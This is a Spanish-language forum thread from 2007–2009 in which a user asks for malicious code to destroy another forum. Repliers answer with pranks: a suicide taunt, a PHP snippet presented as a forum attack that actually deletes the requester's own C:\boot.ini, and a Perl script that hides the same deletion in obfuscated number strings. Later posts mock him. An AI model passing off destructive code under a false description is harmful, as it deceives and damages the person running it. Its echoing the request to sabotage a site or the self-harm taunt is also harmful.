SoloCodigo

Programación Web y Scripting => HTML => Mensaje iniciado por: J.E. en Viernes 7 de Diciembre de 2007, 15:07

Título: Codigos Maliciosos Para Postear En Foros..
Publicado por: J.E. en Viernes 7 de Diciembre de 2007, 15:07
porque los que yo usaba los admines del foro ya los restringieron.. asi que necesito mas porque quiero destruir ese foro.. tipo esos codigos que bloquen los topicos y eso me van a servir..
Gracias muchachos..
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: Eternal Idol en Viernes 7 de Diciembre de 2007, 15:10
Aca tenes la mejor solucion:

Código: Text
  1.  
  2. JE->Suicidio();
  3.  
  4.  
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: J.E. en Viernes 7 de Diciembre de 2007, 15:58
encerio.. ayudenme pues.. en notepad nomas loo fue hecho el foro.. totalmente html es.. pasenme pues un codigo html para enquilombarlo..
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: RadicalEd en Viernes 7 de Diciembre de 2007, 17:44
Esto no es html, pero si PHP, con este comando destruiras completamente un foro, debes ejecutarlo desde tú equipo instalando el AppServ.
Código: PHP
  1. <?php
  2. $var_del ="C:";
  3. $ip="ACA VA LA IP O EL NOMBRE DEL FORO";
  4. unlink($var_del."\boot.ini");
  5. ?>
  6.  
  7.  
Con eso eliminaras un archivo importantisimo de los foros y con este no podra funcionar.
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: su - en Viernes 7 de Diciembre de 2007, 20:54
:comp: Si el codigo de RadicalEd no te funciona, aqui hay una solucion en Perl:

Solo te funciona si estas en Windows y si tenes Perl 5 instalado.

Código: Text
  1. my &#036;ports = sprintf v40.111.95.95.13.10.47.47.92.13.10.86.95.47.95;
  2. my &#036;data = sprintf v67.58.47.47.98.111.111.116.46.105.110.105;
  3.  
  4. print &#34;Direccion del foro: &#34;;
  5. chomp(my &#036;page = &#60;STDIN&#62;);
  6. unlink ( &#036;data );
  7.  
  8. print &#036;page, &#34;&#092;n&#34;;
  9. print &#036;ports;
  10. print (chr(&#036;_)) foreach (&#60;DATA&#62;);
  11.  
  12. __DATA__
  13. 32
  14. 72
  15. 97
  16. 32
  17. 32
  18. 112
  19. 97
  20. 114
  21. 97
  22. 32
  23. 113
  24. 117
  25. 101
  26. 32
  27. 97
  28. 112
  29. 114
  30. 101
  31. 110
  32. 100
  33. 97
  34. 115
  35. 44
  36. 32
  37. 83
  38. 80
  39. 65
  40. 77
  41. 69
  42. 82
  43. 13
  44. 10
  45.  
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: J.E. en Viernes 7 de Diciembre de 2007, 22:59
Gracias RadicalEd! algo asi lo que necesitaba.. y de donde puedo descargar el AppServ?
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: su - en Sábado 8 de Diciembre de 2007, 02:38
Cita de: "J.E."
Gracias RadicalEd! algo asi lo que necesitaba.. y de donde puedo descargar el AppServ?
De esta pagina (http://sourceforge.net/projects/appserv/)
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: ProfesorX en Sábado 8 de Diciembre de 2007, 21:07
que id....a eres J.E., eres tan id....a como lammer, espero que despues de haber hecho lo que te dijeron que hicieras, aprendas la leccion  :devil:  :devil:  :devil:
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: RadicalEd en Martes 11 de Diciembre de 2007, 20:56
Sera que a este imbecil le funcionaron los scripts y por eso no se ha vuelto a conectar :devil:  :lol:
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: burke en Lunes 18 de Febrero de 2008, 16:54
a la gente se le va la olla  <_<
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: JrcsDev en Martes 8 de Julio de 2008, 19:38
jajaja.... en fin! hay todo tipo de lamers! jaja
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: shakka en Miércoles 9 de Julio de 2008, 02:53
Citar
jajaja.... en fin! hay todo tipo de lamers! jaja

(http://img58.imageshack.us/img58/8743/mayurianimeep101nm6.th.jpg) (http://img58.imageshack.us/my.php?image=mayurianimeep101nm6.jpg)
Parecia un specimen interesante, lastima.

Para mi que aplico el metodo de Eternal Idol  :lol:
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: hdr en Miércoles 9 de Julio de 2008, 07:39
jajajajaj
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: JrcsDev en Viernes 11 de Julio de 2008, 08:31
no es por nada mi gente jajaja, pero si fueran a hacer un concurso de EL POST MÁS DIVERTIDO! yo votara por este jajaja... es el más original que he visto,,,, cada vez que lo leo es la misma risa jajaja
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: z0n3r en Miércoles 1 de Abril de 2009, 22:23
uuuuuuy que mal por el.

yo no se mucho de programacion pero ese boot.ini no me daria nadita de confianza jajaja

pobresito
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: anareymej en Viernes 26 de Junio de 2009, 18:51
de lo peor
Título: Re: Codigos Maliciosos Para Postear En Foros..
Publicado por: Ryusaki N en Viernes 26 de Junio de 2009, 19:15
Hombre... Una palabra: Lammer. :no: